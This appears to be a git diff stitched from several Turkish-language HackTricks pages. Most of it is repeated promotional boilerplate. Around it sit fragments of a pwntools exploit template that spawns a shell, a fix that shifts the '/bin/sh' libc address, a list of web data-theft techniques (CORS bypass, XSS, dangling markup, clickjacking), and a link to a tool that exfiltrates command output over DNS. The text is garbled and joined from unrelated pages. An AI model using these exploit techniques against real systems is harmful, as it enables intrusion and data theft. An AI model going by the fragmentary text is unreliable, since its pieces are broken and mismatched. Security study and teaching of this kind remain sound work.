Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>HackTricks'i Destekle</summary>
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuzu
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
```python
from pwn import *
from time import sleep
@ -149,16 +150,17 @@ format_string.execute_writes()
P.interactive()
```
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da **takip edin**.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,16 +1,17 @@
<detaylar>
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<özet><güçlü>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</güçlü> <a href="https://training.hacktricks.xyz/courses/arte"><güçlü>htARTE (HackTricks AWS Red Team Expert)</güçlü></a><güçlü> ile!</güçlü></özet>
<details>
HackTricks'ı desteklemenin diğer yolları:
<summary>HackTricks'i Destekleyin</summary>
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na (https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuzu
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</detaylar>
</details>
{% endhint %}
{% code title="template.py" %}
@ -199,11 +200,11 @@ P.interactive() #Interact with your shell :)
```
{% endcode %}
# Ortak problemler
# Ortak sorunlar
## MAIN_PLT = elf.symbols\['main'] bulunamadı
## MAIN\_PLT = elf.symbols\['main'] bulunamadı
Eğer "main" sembolü mevcut değilse. O zaman sadece main kodunun nerede olduğunu bulabilirsiniz:
Eğer "main" sembolü mevcut değilse (muhtemelen çıkarılmış bir ikili dosya olduğu için). O zaman sadece ana kodun nerede olduğunu bulabilirsiniz:
```python
objdump -d vuln_binary | grep "\.text"
Disassembly of section .text:
@ -219,22 +220,23 @@ Eğer ikili dosya Puts kullanmıyorsa, şunu kontrol etmelisin:
## `sh: 1: %s%s%s%s%s%s%s%s: not found`
Bu **hata**yı tüm saldırıyı oluşturduktan sonra bulursan: `sh: 1: %s%s%s%s%s%s%s%s: not found`
Bu **hata**yı tüm exploit oluşturduktan sonra bulursan: `sh: 1: %s%s%s%s%s%s%s%s: not found`
Deneyin ve **"/bin/sh" adresinden 64 bayt çıkarın**:
Deneyerek **"/bin/sh" adresinden 64 bayt çıkar**:
```python
BINSH = next(libc.search("/bin/sh")) - 64
```
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.**
</details>
{% endhint %}

View file

@ -1,37 +1,39 @@
# Web'den Hassas Bilgi Sızdırma
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin.
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonunu.
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
Eğer bir noktada **oturumunuza dayalı olarak size hassas bilgiler sunan bir web sayfası bulursanız**: Belki çerezleri yansıtıyor, veya kredi kartı bilgilerini veya başka hassas bilgileri yazdırıyor, bunu çalmayı deneyebilirsiniz.\
İşte bunu başarmak için deneyebileceğiniz ana yöntemler:
Eğer bir noktada **oturumunuza bağlı olarak size hassas bilgiler sunan bir web sayfası bulursanız**: Belki çerezleri yansıtıyor, veya kredi kartı detaylarını yazdırıyor veya başka hassas bilgileri, bunları çalmayı deneyebilirsiniz.\
İşte bunu başarmak için deneyebileceğiniz temel yolları size sunuyorum:
* [**CORS atlatma**](pentesting-web/cors-bypass.md): CORS başlıklarını atlayabilirseniz, kötü niyetli bir sayfa için Ajax isteği yaparak bilgileri çalabilirsiniz.
* [**XSS**](pentesting-web/xss-cross-site-scripting/): Sayfada bir XSS zafiyeti bulursanız, bunu kötüye kullanarak bilgileri çalmak mümkün olabilir.
* [**Dangling Markup**](pentesting-web/dangling-markup-html-scriptless-injection/): XSS etiketlerini enjekte edemiyorsanız, diğer düzenli HTML etiketlerini kullanarak bilgileri çalmak mümkün olabilir.
* [**Clickjacking**](pentesting-web/clickjacking.md): Bu saldırıya karşı koruma yoksa, kullanıcıyı hassas verileri size göndermeye kandırabilirsiniz (bir örnek [burada](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)).
* [**XSS**](pentesting-web/xss-cross-site-scripting/): Sayfada bir XSS zafiyeti bulursanız, bunu kötüye kullanarak bilgileri çalabilirsiniz.
* [**Dangling Markup**](pentesting-web/dangling-markup-html-scriptless-injection/): XSS etiketleri enjekte edemiyorsanız bile, diğer düzenli HTML etiketlerini kullanarak bilgileri çalabilirsiniz.
* [**Clickjaking**](pentesting-web/clickjacking.md): Bu saldırıya karşı koruma yoksa, kullanıcıyı hassas verileri size göndermeye kandırabilirsiniz (bir örnek [burada](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)).
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin.
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonunu.
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,30 +1,14 @@
<details>
<summary><strong>Sıfırdan kahraman olana kadar AWS hackleme</strong> için <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> öğrenin!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na (https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks** (https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
</details>
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olana kadar AWS hackleme</strong> için <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na (https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks** (https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github depolarına katkıda bulunun.**
</details>
{% endhint %}

View file

@ -1,43 +1,29 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin**.
* **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
# Temel Yükler
# Temel Payloadlar
* **Basit Liste:** Her satırda bir giriş içeren bir liste
* **Çalışma Zamanı Dosyası:** Bellekte yüklenmeyen, çalışma zamanında okunan bir liste. Büyük listeleri desteklemek için.
* **Durum Değişikliği:** Dizelerin bir listesine bazı değişiklikler uygulayın (Değişiklik yapma, küçük harfe çevirme, BÜYÜK HARFE ÇEVİRME, Doğru ad - İlk harf büyük ve geri kalan küçük-, Doğru Ad -İlk harf büyük ve geri kalan aynı kalır-.
* **Durum Değişikliği:** Bir dizi dizeye bazı değişiklikler uygulayın (Değişiklik yok, küçük harfe, BÜYÜK HARFE, İlk harfi büyük ve geri kalanı küçük olan Proper isim - İlk harfi büyük ve geri kalanı aynı kalan Proper İsim -.
* **Sayılar:** X'ten Y'ye Z adımı kullanarak veya rastgele sayılar oluşturun.
* **Kaba Kuvvet:** Karakter seti, min ve max uzunluk.
* **Brute Forcer:** Karakter seti, min ve max uzunluk.
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Komutları yürütmek ve çıktıyı burpcollab'a DNS istekleri aracılığıyla almak için yük.
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Komutları yürütmek ve çıktıyı burpcollab'a DNS istekleri aracılığıyla almak için Payload.
{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
<details>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin**.
* **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
</details>

View file

@ -1,33 +1,35 @@
# E-posta Güvenlik Açıkları
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan Kahramana AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi **HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks** [**ve HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github depolarına PR'lar gönderin.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.**
</details>
{% endhint %}
##
##
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan Kahramana AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
